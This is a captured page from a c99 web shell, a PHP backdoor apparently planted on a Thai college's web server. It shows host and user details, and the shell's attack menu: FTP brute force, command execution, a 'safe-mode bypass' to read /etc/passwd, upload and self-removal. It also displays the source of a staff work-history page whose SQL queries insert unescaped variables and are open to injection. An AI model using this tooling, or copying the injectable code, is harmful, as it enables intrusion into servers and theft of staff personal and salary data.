!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/   drwxr-xr-x
Free 52.81 GB of 127.8 GB (41.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Show_Work_History.php (7.73 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    session_start
();
    
    
/**  Define Validate Access  */
    
define'_VALID_ACCESS');

    
/**  Check Session User Login  */
    
if( !session_is_registered("valid_user") && !session_is_registered("Priority") ) {
        echo 
"<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";
        echo 
"<p style=padding-top:115px><p align=center><br /><font color=red><strong>กรุณาทำการ Login ก่อน</strong></font></p></p>";
        echo 
"<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";
        exit();
    } 
    else {
        
/**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/framework.php" );
        require_once( 
"../include/Function.php" );
    
        
/**  Create Database Object  */
        
$dbObj = new DBConn;
        
        
/**  Config Table for This Page  */
        
$myTable "personal_tb";
        
        
$Username $valid_user;

        
$query " SELECT *, prefixName as First_name FROM $myTable LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId WHERE  Teacher_code ='$Teacher_code' ";
        
$result $dbObj->execQuery($query);
        
$rs $dbObj->fetchArray($result);
        
        
        
/**  โฟลเดอร์ไฟล์เอกสาร */
        
$doc_path $_Config_live_site."/personal_pic";
    } 
# else
 
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<link href="../css/default.css" rel="stylesheet" type="text/css" />
<title>ข้อมูลประวัติส่วนตัว - ข้อมูลประวัติการทำงาน</title>
<style type="text/css">
<!--
.style22 {font-size: 14px; font-weight: bold; }
-->
</style>
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<?php
    
include("../templates/incHeader.php");
?>
<table width="1003" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="203" align="left" valign="top" style="padding:10px 0px 0px 5px"><?php include("./_incMainMenu.php");?></td>
    <td width="800" height="440" align="left" valign="top" style="padding:10px 0px 5px 10px"><fieldset><legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="index.php">หน้าหลัก</a></font><img src="../picture/ico3.gif" width="10" height="10" align="absmiddle" border="0" /></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Menu_History.php?Teacher_code=<?=$rs[Teacher_code];?>">ข้อมูลส่วนตัว</a></font><img src="../picture/ico3.gif" width="10" height="10" align="absmiddle" border="0" /></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="Edit_Work_History.php?Teacher_code=<?=$rs[Teacher_code];?>">แก้ไขประวัติการทำงาน</a></font><img src="../picture/ico3.gif" width="10" height="10" align="absmiddle" border="0" /></font><span class="NOTE"><strong>ข้อมูลประวัติการทำงาน</strong></font></span></legend>
      <table width="754" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td width="754" height="5"></td>
      </tr>
      
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td align="center">
            <table width="750" border="0" cellpadding="1" cellspacing="4">
              <tr>
                <td colspan="3"><hr /></td>
                 </tr>
              <tr>
                <td>&nbsp;</td>
                <td colspan="2" align="center"><strong>ประวัติการทำงาน</strong></td>
                 </tr>
              <tr>
                <td>&nbsp;</td>
                <td>ชื่อ-นามสกุล : <?php echo $rs["First_name"]." ".$rs["Teacher_name"]." ".$rs["Teacher_lastname"] ;?></td>
                <td>ชื่อเข้าใช้ระบบงาน : <?php echo $rs["Teacher_id"] ;?></td>
              </tr>
              <tr>
                <td width="10">&nbsp;</td>
                <td width="383">ตำแหน่งทางราชการ :
                  <?php
         $PositionId  
=  $rs['PositionId'] ;
         
$sql "Select * From  position_tb    Where  PositionId='$PositionId' ";
          
$result2 mysql_query($sql) or die("Error".mysql_error());
          
$rss3 mysql_fetch_array($result2);
          echo 
"$rss3[Position_name] ";
         
?></td>
                <td width="343">รหัสงานพัฒนาบุคคลากร : <?php echo $rs["Club_no"] ;?></td>
                </tr>
              <tr>
                <td>&nbsp;</td>
                <td>ตำแหน่งการบริหาร : <?php echo "$rs[Manage_pos]";  ?></td>
                <td>ประเภทบุคลากร : <?php 
                            
                              $Ptype_code 
$rs["Person_type"];
                            
$sql1 "Select * From person_type_tb Where Ptype_code='$Ptype_code'";
                            
$result1 mysql_query($sql1) or die(" Error ".mysql_error());
                            
$rs1 mysql_fetch_array($result1);
                            echo 
"$rs1[Ptype_name]";
                          
?></td>
                </tr>
              <tr>
                <td>&nbsp;</td>
                <td>วันที่เริ่มรับราชการ : <?php echo ymdT2dmyText($rs[Year_gov]); ?></td>
                <td>ประเภทสายงาน :   <?php 
                        $Ttype_code 
$rs["Teacher_type"];
                        
$sql2 "Select * From teacher_type_tb Where Ttype_code='$Ttype_code'";
                        
$result2 mysql_query($sql2) or die(" Error ".mysql_error());
                        
$rs2 mysql_fetch_array($result2);
                        echo 
"$rs2[Ttype_name]";
                      
?></td>
                </tr>
              <tr>
                <td>&nbsp;</td>
                <td>วันที่เริ่มทำงานในวิทยาลัย : <?php echo ymdT2dmyText($rs[Year_coll]); ?></td>
                <td>เลขที่ใบประกอบวิชาชีพ :  <?php echo $rs["Gover_id"] ;?></td>
                </tr>
              <tr>
                <td>&nbsp;</td>
                <td>วันที่เริ่มทำการสอนในวิทยาลัย : <?php echo ymdT2dmyText($rs[Year_fac]);    ?></td>
                <td>วันหมดอายุใบประกอบวิชาชีพ : <?php echo ymdT2dmyText($rs["Date_gover"]) ;?></td>
                </tr>
              <tr>
                <td>&nbsp;</td>
                <td>สังกัดหน่วยงาน : <?php 
                            $Faculty_code 
$rs["Faculty_code"];
                            
$Strsql "Select * From faculty_tb Where Faculty_code ='$Faculty_code' ";
                            
$res mysql_query($Strsql) or die("Error $sql".mysql_error());
                            
$rss mysql_fetch_array($res);
                            echo 
"$rss[Faculty_name]";
                        
?>&nbsp;&nbsp; &nbsp;&nbsp; &nbsp;&nbsp;</td>
                <td>เลขที่สมาชิกสภาการพยาบาล : <?php echo $rs["Club_nid"] ;?></td>
                </tr>
              <tr>
                <td>&nbsp;</td>
                <td> กลุ่ม/งาน
                  : <?php
        $conId  
=  $rs['conId'] ;
         
$sql "Select * From   facultycon_tb    Where  conId='$conId'";
          
$result2 mysql_query($sql) or die("Error".mysql_error());
          
$rss3 mysql_fetch_array($result2);
          echo 
"$rss3[Group_name] ";
         
?></td>
                <td>&nbsp;</td>
                </tr>
              <tr>
                <td>&nbsp;</td>
                <td>เงินเดือน : <?php echo number_format($rs["Salary_1"]);?> บาท</td>
                <td>&nbsp;</td>
              </tr>
              <tr>
                <td>&nbsp;</td>
                <td>เงินค่าตอบแทนวิชาชีพ : <?php echo number_format($rs["Salary_2"]); ?> บาท</td>
                <td>&nbsp;</td>
              </tr>
              <tr>
                <td>&nbsp;</td>
                <td>เงินประจำตำแหน่ง : <?php echo number_format($rs["Salary_3"]);?> บาท</td>
                <td>&nbsp;</td>
                </tr>
              <tr>
                <td>&nbsp;</td>
                <td>ความสามารถพิเศษ</td>
                <td>&nbsp;</td>
              </tr>
              <tr>
                <td>&nbsp;</td>
                <td colspan="2"><?php   echo htmlspecialchars_decodenl2br$rs['Skill'] ) ); ?></td>
                 </tr>
              </table>
            <hr />             </td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
    </table>
   </fieldset></td>
  </tr>
</table>
<?php include("../templates/incFooter.php"); ?>
</body>
</html>
<?php
    
/**  Free Resource */
    
$dbObj->freeresult($result);
    
    
/**  Close the Database  */
    
$dbObj->disconn();
    
    
/**  Unset Class  */
    
unset($dbObj);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0064 ]--